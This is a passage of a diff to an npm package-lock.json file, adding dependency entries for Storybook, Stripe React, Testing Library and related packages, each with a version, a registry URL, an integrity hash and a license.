"sha512-Vj7sf++t5pBD637NSfkxpHSMfWaeig5+DKWLhcqIYx6mWQz5hdJTGDVMQiJcw1ZYkhs7AazKDGpRVji1LJCZUQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": 
"https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/codemod/node_modules/slash": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-5.1.0.tgz", + "integrity": "sha512-ZA6oR3T/pEyuqwMgAKT0/hAv8oAXckzbkmR0UkUosQ+Mc4RxGoJkRmwHgHufaenlyAgE1Mxgpdcrf75y6XcnDg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/codemod/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@storybook/codemod/node_modules/write-file-atomic": { + "version": "2.4.3", + "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-2.4.3.tgz", + "integrity": "sha512-GaETH5wwsX+GcnzhPgKcKjJ6M2Cq3/iZp1WyY/X1CSqrW+jVNM9Y7D8EC2sM4ZG/V8wZlSniJnCKWPmBYAucRQ==", + "dev": true, + "license": "ISC", + "dependencies": { + "graceful-fs": "^4.1.11", + "imurmurhash": "^0.1.4", + "signal-exit": "^3.0.2" + } + }, + "node_modules/@storybook/components": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/components/-/components-8.6.4.tgz", + "integrity": "sha512-91VEVFWOgHkEFoNFMk6gs1AuOE9Yp7N283BXQOW+AgP+atpzED6t/fIBPGqJ2ewAuzLJ+cFOrasSzoNwVfg3Jg==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.2.0 || ^8.3.0-0 || ^8.4.0-0 || ^8.5.0-0 || ^8.6.0-0" + } + }, + "node_modules/@storybook/core": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/core/-/core-8.6.4.tgz", + "integrity": "sha512-glDbjEBi3wokw1T+KQtl93irHO9N0LCwgylWfWVXYDdQjUJ7pGRQGnw73gPX7Ds9tg3myXFC83GjmY94UYSMbA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/theming": "8.6.4", + "better-opn": "^3.0.2", + "browser-assert": "^1.2.1", + "esbuild": "^0.18.0 || ^0.19.0 || ^0.20.0 || ^0.21.0 || ^0.22.0 || ^0.23.0 || ^0.24.0 || ^0.25.0", + "esbuild-register": "^3.5.0", + "jsdoc-type-pratt-parser": "^4.0.0", + "process": "^0.11.10", + "recast": "^0.23.5", + "semver": "^7.6.2", + "util": "^0.12.5", + "ws": "^8.2.3" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "prettier": "^2 || ^3" + }, + "peerDependenciesMeta": { + "prettier": { + "optional": true + } + } + }, + "node_modules/@storybook/core-webpack": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/core-webpack/-/core-webpack-8.6.4.tgz", + "integrity": "sha512-/E+NDs4Ls2KQhQJyEbqyddvcevPGCNbBIRoR691gq2lnZV7lYFfhpGfYlXL1uSoA3WUWmql/gBsa2/O3vB+HKg==", + "dev": true, + "license": "MIT", + "dependencies": { + "ts-dedent": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/core/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + 
"semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@storybook/csf-plugin": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/csf-plugin/-/csf-plugin-8.6.4.tgz", + "integrity": "sha512-7UpEp4PFTy1iKjZiRaYMG7zvnpLIRPyD0+lUJUlLYG4UIemV3onvnIi1Je1tSZ4hfTup+ulom7JLztVSHZGRMg==", + "dev": true, + "license": "MIT", + "dependencies": { + "unplugin": "^1.3.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/global": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@storybook/global/-/global-5.0.0.tgz", + "integrity": "sha512-FcOqPAXACP0I3oJ/ws6/rrPT9WGhu915Cg8D02a9YxLo0DE9zI+a9A5gRGvmQ09fiWPukqI8ZAEoQEdWUKMQdQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@storybook/icons": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/@storybook/icons/-/icons-1.3.2.tgz", + "integrity": "sha512-t3xcbCKkPvqyef8urBM0j/nP6sKtnlRkVgC+8JTbTAZQjaTmOjes3byEgzs89p4B/K6cJsg9wLW2k3SknLtYJw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta" + } + }, + "node_modules/@storybook/instrumenter": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/instrumenter/-/instrumenter-8.6.4.tgz", + "integrity": "sha512-8OtIWLhayTUdqJEeXiPm6l3LTdSkWgQzzV2l2HIe4Adedeot+Rkwu6XHmyRDpnb0+Ish6zmMDqtJBxC2PQsy6Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "@vitest/utils": "^2.1.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/manager-api": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/manager-api/-/manager-api-8.6.4.tgz", + "integrity": "sha512-w/Nn/VznfbIg2oezDfzZNwSTDY5kBZbzxVBHLCnIcyu2AKt2Yto3pfGi60SikFcTrsClaAKT7D92kMQ9qdQNQQ==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.2.0 || ^8.3.0-0 || ^8.4.0-0 || ^8.5.0-0 || ^8.6.0-0" + } + }, + "node_modules/@storybook/node-logger": { + "version": "8.0.4", + "resolved": "https://registry.npmjs.org/@storybook/node-logger/-/node-logger-8.0.4.tgz", + "integrity": "sha512-cALLHuX53vLQsoJamGRlquh2pfhPq9copXou2JTmFT6mrCcipo77SzhBDfeeuhaGv6vUWPfmGjPBEHXWGPe4+g==", + "dev": true, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + } + }, + "node_modules/@storybook/preset-react-webpack": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/preset-react-webpack/-/preset-react-webpack-8.6.4.tgz", + "integrity": "sha512-rFd1NvSE2ZP5ZFEqH7wdXXlvnyNChSMp+w4FyGSCgFQOwQKZhhWPPyloi3gGSWztFV9qpzC/ri7TTvG6ptqPPw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/core-webpack": "8.6.4", + "@storybook/react": "8.6.4", + "@storybook/react-docgen-typescript-plugin": "1.0.6--canary.9.0c3f3b7.0", + "@types/semver": "^7.3.4", + "find-up": "^5.0.0", + "magic-string": "^0.30.5", + "react-docgen": "^7.0.0", + "resolve": "^1.22.8", + "semver": "^7.3.7", + "tsconfig-paths": "^4.2.0", + "webpack": "5" + }, + "engines": { + "node": ">=18.0.0" + }, + "funding": { + 
"type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@storybook/preset-react-webpack/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@storybook/preset-react-webpack/node_modules/tsconfig-paths": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/tsconfig-paths/-/tsconfig-paths-4.2.0.tgz", + "integrity": "sha512-NoZ4roiN7LnbKn9QqE1amc9DJfzvZXxF4xDavcOWt1BPkdx+m+0gJuPM+S0vCe7zTJMYUP0R8pO2XMr+Y8oLIg==", + "dev": true, + "license": "MIT", + "dependencies": { + "json5": "^2.2.2", + "minimist": "^1.2.6", + "strip-bom": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/@storybook/preview-api": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/preview-api/-/preview-api-8.6.4.tgz", + "integrity": "sha512-5HBfxggzxGz0dg2c61NpPiQJav7UAmzsQlzmI5SzWOS6lkaylcDG8giwKzASVCXVWBxNji9qIDFM++UH090aDg==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.2.0 || ^8.3.0-0 || ^8.4.0-0 || ^8.5.0-0 || ^8.6.0-0" + } + }, + "node_modules/@storybook/react": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/react/-/react-8.6.4.tgz", + "integrity": "sha512-pfv4hMhu3AScOh0l86uIzmXLSQ0XA/e0reIVwQcxKht6miaKArhx9GkS4mMp6SO23ZoV5G/nfLgUaMVPVE0ZPg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/components": "8.6.4", + "@storybook/global": "^5.0.0", + "@storybook/manager-api": "8.6.4", + "@storybook/preview-api": "8.6.4", + "@storybook/react-dom-shim": "8.6.4", + "@storybook/theming": "8.6.4" + }, + "engines": { + "node": ">=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "@storybook/test": "8.6.4", + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4", + "typescript": ">= 4.2.x" + }, + "peerDependenciesMeta": { + "@storybook/test": { + "optional": true + }, + "typescript": { + "optional": true + } + } + }, + "node_modules/@storybook/react-docgen-typescript-plugin": { + "version": "1.0.6--canary.9.0c3f3b7.0", + "resolved": "https://registry.npmjs.org/@storybook/react-docgen-typescript-plugin/-/react-docgen-typescript-plugin-1.0.6--canary.9.0c3f3b7.0.tgz", + "integrity": "sha512-KUqXC3oa9JuQ0kZJLBhVdS4lOneKTOopnNBK4tUAgoxWQ3u/IjzdueZjFr7gyBrXMoU6duutk3RQR9u8ZpYJ4Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^4.1.1", + "endent": "^2.0.1", + "find-cache-dir": "^3.3.1", + "flat-cache": "^3.0.4", + "micromatch": "^4.0.2", + "react-docgen-typescript": "^2.2.2", + "tslib": "^2.0.0" + }, + "peerDependencies": { + "typescript": ">= 4.x", + "webpack": ">= 4" + } + }, + "node_modules/@storybook/react-docgen-typescript-plugin/node_modules/find-cache-dir": { + "version": "3.3.2", + "resolved": 
"https://registry.npmjs.org/find-cache-dir/-/find-cache-dir-3.3.2.tgz", + "integrity": "sha512-wXZV5emFEjrridIgED11OoUKLxiYjAcqot/NJdAkOhlJ+vGzwhOAfcG5OX1jP+S0PcjEn8bdMJv+g2jwQ3Onig==", + "dev": true, + "license": "MIT", + "dependencies": { + "commondir": "^1.0.1", + "make-dir": "^3.0.2", + "pkg-dir": "^4.1.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/avajs/find-cache-dir?sponsor=1" + } + }, + "node_modules/@storybook/react-docgen-typescript-plugin/node_modules/make-dir": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", + "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", + "dev": true, + "license": "MIT", + "dependencies": { + "semver": "^6.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@storybook/react-dom-shim": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/react-dom-shim/-/react-dom-shim-8.6.4.tgz", + "integrity": "sha512-kTGJ3aFdmfCFzYaDFGmZWfTXr9xhbUaf0tJ6+nEjc4tME6mFwMI+tTUT6U/J6mJhZuc2DjvIRA7bM0x77dIDqw==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/react-webpack5": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/react-webpack5/-/react-webpack5-8.6.4.tgz", + "integrity": "sha512-kH439Atpp94+hWF/xftOJ4ZCy7bnNWuLSni7sWvOGkYZpzzzkLXfACanvK6ZY9wUxAh0bbdGfbc3McMvIWfYlw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/builder-webpack5": "8.6.4", + "@storybook/preset-react-webpack": "8.6.4", + "@storybook/react": "8.6.4" + }, + "engines": { + "node": ">=18.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "react-dom": "^16.8.0 || ^17.0.0 || ^18.0.0 || ^19.0.0-beta", + "storybook": "^8.6.4", + "typescript": ">= 4.2.x" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@storybook/test": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/test/-/test-8.6.4.tgz", + "integrity": "sha512-JPjfbaMMuCBT47pg3/MDD9vYFF5OGPAOWEB9nJWJ9IjYAb2Nd8OYJQIDoYJQNT+aLkTVLtvzGnVNwdxpouAJcQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/global": "^5.0.0", + "@storybook/instrumenter": "8.6.4", + "@testing-library/dom": "10.4.0", + "@testing-library/jest-dom": "6.5.0", + "@testing-library/user-event": "14.5.2", + "@vitest/expect": "2.0.5", + "@vitest/spy": "2.0.5" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.6.4" + } + }, + "node_modules/@storybook/test/node_modules/@testing-library/dom": { + "version": "10.4.0", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-10.4.0.tgz", + "integrity": "sha512-pemlzrSESWbdAloYml3bAJMEfNh1Z7EduzqPKprCH5S341frlpYnUEW0H72dLxa6IsYr+mPno20GiSm+h9dEdQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^5.0.1", + 
"aria-query": "5.3.0", + "chalk": "^4.1.0", + "dom-accessibility-api": "^0.5.9", + "lz-string": "^1.5.0", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/@storybook/test/node_modules/@types/aria-query": { + "version": "5.0.4", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-5.0.4.tgz", + "integrity": "sha512-rfT93uj5s0PRL7EzccGMs3brplhcrghnDoV26NqKhCAS1hVo+WdNsPvE/yb6ilfr5hi2MEk6d5EWJTKdxg8jVw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@storybook/test/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@storybook/test/node_modules/aria-query": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/aria-query/-/aria-query-5.3.0.tgz", + "integrity": "sha512-b0P0sZPKtyu8HkeRAfCq0IfURZK+SuwMjY1UXGBU27wpAiTwQAIlq56IbIO+ytk/JjS1fMR14ee5WBBfKi5J6A==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "dequal": "^2.0.3" + } + }, + "node_modules/@storybook/test/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@storybook/test/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@storybook/theming": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/@storybook/theming/-/theming-8.6.4.tgz", + "integrity": "sha512-g9Ns4uenC9oAWETaJ/tEKEIPMdS+CqjNWZz5Wbw1bLNhXwADZgKrVqawzZi64+bYYtQ+i8VCTjPoFa6s2eHiDQ==", + "dev": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "storybook": "^8.2.0 || ^8.3.0-0 || ^8.4.0-0 || ^8.5.0-0 || ^8.6.0-0" + } + }, + "node_modules/@stripe/react-stripe-js": { + "version": "3.5.0", + "resolved": "https://registry.npmjs.org/@stripe/react-stripe-js/-/react-stripe-js-3.5.0.tgz", + "integrity": "sha512-oo5J2SNbuAUjE9XmQv/SOD7vgZCa1Y9OcZyRAfvQPkyrDrru35sg5c64ANdHEmOWUibism3+25rKdARSw3HOfA==", + "license": "MIT", + "dependencies": { + "prop-types": "^15.7.2" + }, + "peerDependencies": { + "@stripe/stripe-js": ">=1.44.1 <7.0.0", + "react": ">=16.8.0 <20.0.0", + "react-dom": ">=16.8.0 <20.0.0" + } + }, + "node_modules/@stripe/stripe-js": { + "version": "5.10.0", + "resolved": "https://registry.npmjs.org/@stripe/stripe-js/-/stripe-js-5.10.0.tgz", + "integrity": "sha512-PTigkxMdMUP6B5ISS7jMqJAKhgrhZwjprDqR1eATtFfh0OpKVNp110xiH+goeVdrJ29/4LeZJR4FaHHWstsu0A==", + "license": "MIT", + "engines": { + "node": ">=12.16" + } 
+ }, + "node_modules/@swc/helpers": { + "version": "0.5.11", + "resolved": "https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.11.tgz", + "integrity": "sha512-YNlnKRWF2sVojTpIyzwou9XoTNbzbzONwRhOoniEioF1AtaitTvVZblaQRrAzChWQ1bLYyYSWzM18y4WwgzJ+A==", + "dev": true, + "dependencies": { + "tslib": "^2.4.0" + } + }, + "node_modules/@testing-library/cypress": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/@testing-library/cypress/-/cypress-10.0.1.tgz", + "integrity": "sha512-e8uswjTZIBhaIXjzEcrQQ8nHRWHgZH7XBxKuIWxZ/T7FxfWhCR48nFhUX5nfPizjVOKSThEfOSv67jquc1ASkw==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.14.6", + "@testing-library/dom": "^9.0.0" + }, + "engines": { + "node": ">=12", + "npm": ">=6" + }, + "peerDependencies": { + "cypress": "^12.0.0 || ^13.0.0" + } + }, + "node_modules/@testing-library/cypress/node_modules/@testing-library/dom": { + "version": "9.3.3", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-9.3.3.tgz", + "integrity": "sha512-fB0R+fa3AUqbLHWyxXa2kGVtf1Fe1ZZFr0Zp6AIbIAzXb2mKbEXl+PCQNUOaq5lbTab5tfctfXRNsWXxa2f7Aw==", + "dev": true, + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^5.0.1", + "aria-query": "5.1.3", + "chalk": "^4.1.0", + "dom-accessibility-api": "^0.5.9", + "lz-string": "^1.5.0", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@testing-library/cypress/node_modules/@types/aria-query": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@types/aria-query/-/aria-query-5.0.2.tgz", + "integrity": "sha512-PHKZuMN+K5qgKIWhBodXzQslTo5P+K/6LqeKXS6O/4liIDdZqaX5RXrCK++LAw+y/nptN48YmUMFiQHRSWYwtQ==", + "dev": true + }, + "node_modules/@testing-library/cypress/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@testing-library/cypress/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@testing-library/cypress/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@testing-library/dom": { + "version": "8.13.0", + "resolved": "https://registry.npmjs.org/@testing-library/dom/-/dom-8.13.0.tgz", + "integrity": "sha512-9VHgfIatKNXQNaZTtLnalIy0jNZzY35a4S3oi08YAt9Hv1VsfZ/DfA45lM8D/UhtHBGJ4/lGwp0PZkVndRkoOQ==", + "dev": true, + "dependencies": { + "@babel/code-frame": "^7.10.4", + "@babel/runtime": "^7.12.5", + "@types/aria-query": "^4.2.0", + "aria-query": "^5.0.0", + "chalk": "^4.1.0", + 
"dom-accessibility-api": "^0.5.9", + "lz-string": "^1.4.4", + "pretty-format": "^27.0.2" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@testing-library/dom/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@testing-library/dom/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/@testing-library/dom/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@testing-library/jest-dom": { + "version": "6.5.0", + "resolved": "https://registry.npmjs.org/@testing-library/jest-dom/-/jest-dom-6.5.0.tgz", + "integrity": "sha512-xGGHpBXYSHUUr6XsKBfs85TWlYKpTc37cSBBVrXcib2MkHLboWlkClhWF37JKlDb9KEq3dHs+f2xR7XJEWGBxA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@adobe/css-tools": "^4.4.0", + "aria-query": "^5.0.0", + "chalk": "^3.0.0", + "css.escape": "^1.5.1", + "dom-accessibility-api": "^0.6.3", + "lodash": "^4.17.21", + "redent": "^3.0.0" + }, + "engines": { + "node": ">=14", + "npm": ">=6", + "yarn": ">=1" + } + }, + "node_modules/@testing-library/jest-dom/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@testing-library/jest-dom/node_modules/chalk": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-3.0.0.tgz", + "integrity": "sha512-4D3B6Wf41KOYRFdszmDqMCGq5VV/uMAB273JILmO+3jAlh8X4qDtdtgCR3fxtbLEMzSx22QdhnDcJvu2u1fVwg==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@testing-library/jest-dom/node_modules/dom-accessibility-api": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/dom-accessibility-api/-/dom-accessibility-api-0.6.3.tgz", + "integrity": "sha512-7ZgogeTnjuHbo+ct10G9Ffp0mif17idi0IyWNVA/wcwcm7NPOD/WEHVP3n7n3MhXqxoIYm8d6MuZohYWIZ4T3w==", + "dev": true, + "license": "MIT" + }, + "node_modules/@testing-library/jest-dom/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": 
"sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@testing-library/react": { + "version": "12.1.5", + "resolved": "https://registry.npmjs.org/@testing-library/react/-/react-12.1.5.tgz", + "integrity": "sha512-OfTXCJUFgjd/digLUuPxa0+/3ZxsQmE7ub9kcbW/wi96Bh3o/p5vrETcBGfP17NWPGqeYYl5LTRpwyGoMC4ysg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.12.5", + "@testing-library/dom": "^8.0.0", + "@types/react-dom": "<18.0.0" + }, + "engines": { + "node": ">=12" + }, + "peerDependencies": { + "react": "<18.0.0", + "react-dom": "<18.0.0" + } + }, + "node_modules/@testing-library/react-hooks": { + "version": "8.0.1", + "resolved": 